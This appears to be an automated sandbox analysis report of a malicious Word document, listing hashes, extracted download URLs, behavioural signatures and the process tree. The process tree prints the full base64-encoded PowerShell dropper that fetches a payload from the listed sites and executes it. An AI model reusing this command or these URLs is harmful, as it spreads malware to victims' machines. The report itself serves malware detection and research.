Analysis
-
max time kernel
101s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
20-08-2024 08:54
Static task
static1
Behavioral task
behavioral1
Sample
ae97431892a4e244f1ee5dc513ea1528_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
ae97431892a4e244f1ee5dc513ea1528_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ae97431892a4e244f1ee5dc513ea1528_JaffaCakes118.doc
-
Size
187KB
-
MD5
ae97431892a4e244f1ee5dc513ea1528
-
SHA1
6656f517d4c8c517b0aec634f227e929072219d6
-
SHA256
a2ba88f7671dcd2ff21e4527d40086f45df3c3bf24c6041e9aaf60af189f22fc
-
SHA512
3759d21e4d9287eafeb449f57468db39449d36f790d9a51c891f7c3c1033433043b3dcb5318bd97b24adf1eacd2c210359d333bed5a5c677a6aa8016e511ff69
-
SSDEEP
3072:dA9ov+mLIX7wzt0HHDnwjacRHvvvvZ18gEm1:Sat0TwDRv8gEm1
Malware Config
Extracted
http://techiweek.com/wp-includes/FW6/
https://ravi-tools.com/js/1/
https://providedigital.com/wp-admin/Igvi3l/
https://nghiencauca.com/wp-includes/BOInu4E/
http://jietuo66.com/hwqsv/oC/
https://oklatu.com/wp-admin/i/
https://blog.thejobstack.com/pmloibg/M/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2676 2920 POwersheLL.exe 29 -
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2676 POwersheLL.exe 7 2676 POwersheLL.exe 8 2676 POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A46BDDF9-9841-4C63-9D6A-2962E842B474}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A46BDDF9-9841-4C63-9D6A-2962E842B474}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\TypeLib\{A46BDDF9-9841-4C63-9D6A-2962E842B474}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A46BDDF9-9841-4C63-9D6A-2962E842B474}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2948 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2676 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2676 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2948 WINWORD.EXE 2948 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2948 wrote to memory of 2464 2948 WINWORD.EXE 33 PID 2948 wrote to memory of 2464 2948 WINWORD.EXE 33 PID 2948 wrote to memory of 2464 2948 WINWORD.EXE 33 PID 2948 wrote to memory of 2464 2948 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ae97431892a4e244f1ee5dc513ea1528_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABSAHYAYgB1ADkAMABnAD0AKAAnAEoAJwArACgAJwByACcAKwAnADgAYQBkAHUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBQAFIAbwBmAEkAbABFAFwAZgAyAGMANAB4AHQAawBcAHkAcQBfAGkAYgB4AFAAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIARQBDAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAUgBgAGkAdABZAGAAUAByAE8AVABPAGAAYwBgAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAnACsAJwAsACAAJwApACsAKAAnAHQAbABzACcAKwAnADEAMQAsACAAJwArACcAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAEIAcwBtAHcAYgBiAHQAIAA9ACAAKAAnAFgAYgAnACsAKAAnAHUAJwArACcAcQBrACcAKQArACgAJwBsACcAKwAnAGYAegBvACcAKQApADsAJABCAGQAYQBvAGEAcABjAD0AKAAnAFkAJwArACcAcgAnACsAKAAnAF8AXwAnACsAJwBfAGoAdQAnACkAKQA7ACQARgB6ADIAXwB0AGEAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAFcAJwArACcAbwA1AEYAJwApACsAKAAnADIAYwAnACsAJwA0ACcAKwAnAHgAdABrACcAKQArACcAVwBvACcAKwAoACcANQBZAHEAXwAnACsAJwBpAGIAeAAnACkAKwAoACcAcABXAG8AJwArACcANQAnACkAKQAuACIAUgBlAGAAUABsAEEAQwBFACIAKAAoACcAVwAnACsAJwBvADUAJwApACwAJwBcACcAKQApACsAJABCAHMAbQB3AGIAYgB0ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABMAGcAeABqAGcAbgB6AD0AKAAnAEoAYQAnACsAJwBjAF8AJwArACgAJwAyACcAKwAnAG4AcAAnACkAKQA7ACQASgA0AG4AagBpAHoAOQA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgBXAEUAYgBDAGwASQBFAG4AdAA7ACQAWQBfAHQAMABzAHEAZwA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAJwB0ACcAKwAoACcAZQBjACcAKwAnAGgAaQB3AGUAZQBrACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGkAbgBjACcAKwAnAGwAdQBkACcAKQArACgAJwBlAHMALwBGAFcANgAnACsAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAcgAnACsAJwBhAHYAJwApACsAKAAnAGkAJwArACcALQB0AG8AbwBsAHMAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwBqAHMALwAxACcAKQArACcALwAqACcAKwAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwBzADoALwAvACcAKQArACgAJwBwAHIAbwAnACsAJwB2AGkAJwApACsAJwBkACcAKwAoACcAZQBkAGkAJwArACcAZwAnACkAKwAoACcAaQB0AGEAbAAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQBpACcAKwAnAG4AJwArACcALwBJAGcAdgBpACcAKwAnADMAJwArACcAbAAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAnAHQAcAAnACsAKAAnAHMAOgAnACsAJwAvACcAKQArACgAJwAvAG4AJwArACcAZwAnACkAKwAnAGgAaQAnACsAKAAnAGUAbgBjACcAKwAnAGEAdQBjAGEALgAnACsAJwBjAG8AJwApACsAJwBtACcAKwAoACcALwB3AHAALQBpAG4AJwArACcAYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQAnACkAKwAnAHMALwAnACsAJwBCAE8AJwArACgAJwBJAG4AdQAnACsAJwA0AEUALwAqAGgAJwApACsAKAAnAHQAdABwACcAKwAnADoAJwApACsAJwAvACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGkAJwArACcAZQB0AHUAbwA2ADYALgBjAG8AJwArACcAbQAvAGgAJwApACsAKAAnAHcAJwArACcAcQBzAHYALwBvACcAKQArACgAJwBDAC8AJwArACcAKgAnACkAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBvAGsAbABhAHQAJwArACcAdQAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQBhACcAKwAnAGQAbQBpAG4ALwAnACkAKwAoACcAaQAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AC8AJwArACcALwBiAGwAJwArACcAbwBnAC4AJwApACsAKAAnAHQAaABlAGoAbwBiAHMAdAAnACsAJwBhACcAKQArACcAYwAnACsAKAAnAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAnAHAAJwArACgAJwBtAGwAJwArACcAbwBpACcAKQArACcAYgAnACsAKAAnAGcAJwArACcALwBNACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABxADgAYwA4AF8AcgA9ACgAJwBZACcAKwAnADMAJwArACgAJwB4AGwAJwArACcAOAA4AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAHAAMAAzAGcAbQBlACAAaQBuACAAJABZAF8AdAAwAHMAcQBnACkAewB0AHIAeQB7ACQASgA0AG4AagBpAHoAOQAuACIARABgAG8AYABXAG4ATABvAGAAQQBkAGYAaQBMAGUAIgAoACQAWABwADAAMwBnAG0AZQAsACAAJABGAHoAMgBfAHQAYQB3ACkAOwAkAFcAZgA3AF8AYwBmAG0APQAoACgAJwBLADgAYgAnACsAJwBfACcAKQArACcAbQAnACsAJwBkAHYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEYAegAyAF8AdABhAHcAKQAuACIATABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADEAMAAwADMAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrAGUALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAoACQARgB6ADIAXwB0AGEAdwApADsAJABRADUAdABuAHIAaABxAD0AKAAnAEQAJwArACcAbQBvACcAKwAoACcAMgAnACsAJwBuAGgAcQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVQBkAHYAcwBxAGwAYQA9ACgAJwBGAHkAJwArACgAJwBhACcAKwAnADAAcgAnACkAKwAnAGYANQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAagBrAGMAdAA5AG8APQAoACcATAAnACsAKAAnAGoAOAA0ACcAKwAnADkAOQAnACsAJwBiACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5d9648cb1955d6cd3bf80ad4896c251ad
SHA1db239214268f24bb15ca90d1db0e69bb0dd323dd
SHA256ac51c9dd183c4c4d14d73c359ec8714cbe8a4cec80ad4770aa847d7a9745b35e
SHA512d5d54ac5fff140673e66b15a4c242850878c56abb6fe625d9bb857a7146b648d3bef93591e32dc074a55a53d0a256159b6bbc5f8bfd53f724333071686073510